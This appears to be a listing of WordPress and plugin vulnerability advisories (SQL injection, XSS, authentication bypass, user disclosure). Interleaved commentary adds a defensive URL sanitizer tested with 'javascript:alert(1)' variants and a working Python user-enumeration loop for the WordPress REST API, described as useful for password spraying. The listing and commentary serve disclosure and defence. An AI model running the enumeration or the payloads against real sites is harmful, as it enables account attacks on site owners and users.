WooCommerce Payments Plugin for WordPress 5.3.x < 5.3.1 Authentication Bypass
The WooCommerce Payments Plugin installed on the remote host is affected by an authentication bypass vulnerability. Note that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number. No source data...
WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
A JavaScript payload such as "javascript:alert(1)" in a URL could cause a Cross-Site Scripting (XSS) vulnerability. According to the commit message (see references): "wp_kses_bad_protocol makes sure to validate that uri attributes don't contain invalid/or not allowed protocols. While this work...
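The kind of check the commit message describes, as an added illustration (this is not WordPress's kses.php code and does not reproduce the specific bypass, which the snippet above does not detail): a scheme allowlist that decodes HTML entities and strips whitespace/control characters before looking at the part in front of the colon. The practitioner's caveat is that any scheme check performed before that normalization sees a different string than the browser will. Function names and the allowlist are my own assumptions.

```python
import html
import re

# Assumed allowlist; WordPress's own list is configurable and longer.
ALLOWED_SCHEMES = {"http", "https", "mailto", "ftp", "tel"}

# ASCII whitespace and control characters, which browsers ignore inside a scheme
# ("java\tscript:" parses as "javascript:").
_CTRL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")

# A URL scheme per RFC 3986: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":".
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def normalize(url: str, rounds: int = 3) -> str:
    """Decode HTML entities and drop control characters until the string stops changing.

    Repeating the decode catches double-encoded input such as '&amp;colon;'.
    A browser decodes attribute values only once, so this is deliberately
    stricter than the browser (it may reject some harmless strings, never the reverse).
    """
    prev, cur = None, url
    for _ in range(rounds):
        if cur == prev:
            break
        prev = cur
        cur = _CTRL_OR_SPACE.sub("", html.unescape(cur))
    return cur


def is_safe_url(url: str) -> bool:
    """True if the URL has no scheme (relative) or its scheme is on the allowlist."""
    match = _SCHEME.match(normalize(url))
    if match is None:
        return True          # no scheme at all: a relative URL
    return match.group(1).lower() in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed inputs: a plain payload and the same payload with the colon hidden.
    for candidate in ("https://example.invalid/", "/wp-admin/",
                      "javascript:alert(1)", "javascript&#58;alert(1)",
                      "javascript&colon;alert(1)", "java\tscript:alert(1)"):
        print(f"{candidate!r:40} -> {'allow' if is_safe_url(candidate) else 'block'}")
```

The order matters: a check that looks for a literal `:` in the raw attribute value would accept `javascript&#58;alert(1)`, while `normalize()` turns it back into `javascript:alert(1)` before the scheme is compared. Decoding in a loop is the conservative choice for a sanitizer that sits in front of many different renderers.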
Wordpress 5.3 - User Disclosure Exploit
Exploit for php platform in category web applications Exploit Title : Wordpress 5.3 - User Disclosure Author: SajjadBnd Software Link: https://wordpress.org/download/ version : wp ' vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.get(vuln, verify=False) content = json.loads(r.text)...
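What the truncated exploit loop above is doing, written out as an added example (my code, not SajjadBnd's): walk the paginated `/wp-json/wp/v2/users/` endpoint, pull the `id`, `slug` and `name` fields out of each page, and stop on the first empty page or REST error object. The `slug` field is the user's `user_nicename`, which WordPress derives from the login name by default, so it is the value of interest for password-spraying or targeted phishing. The sample responses and the fetch functions are constructed so the block runs offline; the `page` parameter and the error-object shape are the standard WP REST conventions.

```python
import json
from typing import Callable, List, Tuple

# Constructed sample pages shaped like /wp-json/wp/v2/users/?page=N.
# Field names (id, name, slug) are the real WP REST user fields; the values are made up.
SAMPLE_PAGES = {
    1: [
        {"id": 1, "name": "Site Admin", "slug": "admin"},
        {"id": 2, "name": "Jane Doe", "slug": "jdoe"},
    ],
    2: [
        {"id": 7, "name": "Mark White", "slug": "mwhite"},
    ],
}

# Constructed stand-in for what a site that blocks the endpoint returns
# (a WP REST error object rather than a list).
BLOCKED_RESPONSE = {
    "code": "rest_user_cannot_view",
    "message": "Sorry, you are not allowed to list users.",
    "data": {"status": 401},
}

User = Tuple[int, str, str]  # (id, slug, name)


def fake_fetch(page: int) -> str:
    """Offline stand-in for requests.get(url + '/wp-json/wp/v2/users/?page=%d' % page).text"""
    return json.dumps(SAMPLE_PAGES.get(page, []))


def blocked_fetch(page: int) -> str:
    """Offline stand-in for a hardened site that refuses to list users."""
    return json.dumps(BLOCKED_RESPONSE)


def extract_users(body: str) -> List[User]:
    """Parse one response body. Anything that is not a JSON list of user objects yields []."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, list):
        return []          # REST error object, HTML error page turned JSON, etc.
    return [
        (u["id"], u["slug"], u.get("name", ""))
        for u in data
        if isinstance(u, dict) and "id" in u and "slug" in u
    ]


def enumerate_users(fetch: Callable[[int], str], max_pages: int = 20) -> List[User]:
    """The exploit's `while True` loop with a page bound and a clean stop condition."""
    users: List[User] = []
    for page in range(1, max_pages + 1):
        found = extract_users(fetch(page))
        if not found:
            break              # empty page: past the last user; error object: endpoint blocked
        users.extend(found)
    return users


if __name__ == "__main__":
    for uid, slug, name in enumerate_users(fake_fetch):
        print(f"{uid:>4}  {slug:<12} {name}")
    print("blocked site ->", enumerate_users(blocked_fetch))
```

To run it against a site you are authorized to test, replace `fake_fetch` with a function that performs the HTTP request and returns the body text; the parsing and the stop condition stay the same. On the defensive side, the `blocked_fetch` case shows the response shape you should see once user listing is restricted to authenticated requests.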
WordPress Plugin Sliced Invoices 3.8.2 - post SQL Injection
Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection Date: 2019-10-22 Exploit Author: Lucian Ioan Nitescu Contact: https://twitter.com/LucianNitescu Website: https://nitesculucian.github.io Vendor Homepage:...
WordPress Plugin Sliced Invoices 3.8.2 - 'post' SQL Injection
Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection Date: 2019-10-22 Exploit Author: Lucian Ioan Nitescu Contact: https://twitter.com/LucianNitescu Website: https://nitesculucian.github.io Vendor Homepage: https://slicedinvoices.com/ Software Link:...
Groundhogg <= 1.3.11.3 - Authenticated SQL Injection
Wordpress Groundhogg plugin at version 1.3.11.3 or lower is affected by an Authenticated SQL Injection vulnerability. PoC Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability Date: 23-10-2019 Exploit Author: Lucian Ioan Nitescu Contact:...
Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS
Wordpress Groundhogg plugin at version 2.0.8.1 or lower is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability. Exploit Title: Wordpress Groundhogg /wp-admin/admin.php?page=ghbulkjobs&action=ghexportcontactsalert1 - The response will contain: bulkaction:...
Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS
Wordpress Groundhogg plugin at version 2.0.8.1 or lower is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability. PoC Exploit Title: Wordpress Groundhogg /wp-admin/admin.php?page=ghbulkjobs=ghexportcontacts/ajax', items: bp.getItems, theend: bp.isLastOfThem ,...
Sliced Invoices <= 3.8.2 - Multiple Vulnerabilities
- Unauthenticated information disclosure, allowing attackers to access arbitrary invoices and quotes containing PII
- Authenticated SQL injection and information disclosure
- Additional issues, such as lack of CSRF and authorisation checks on AJAX methods used to search invoices
- ...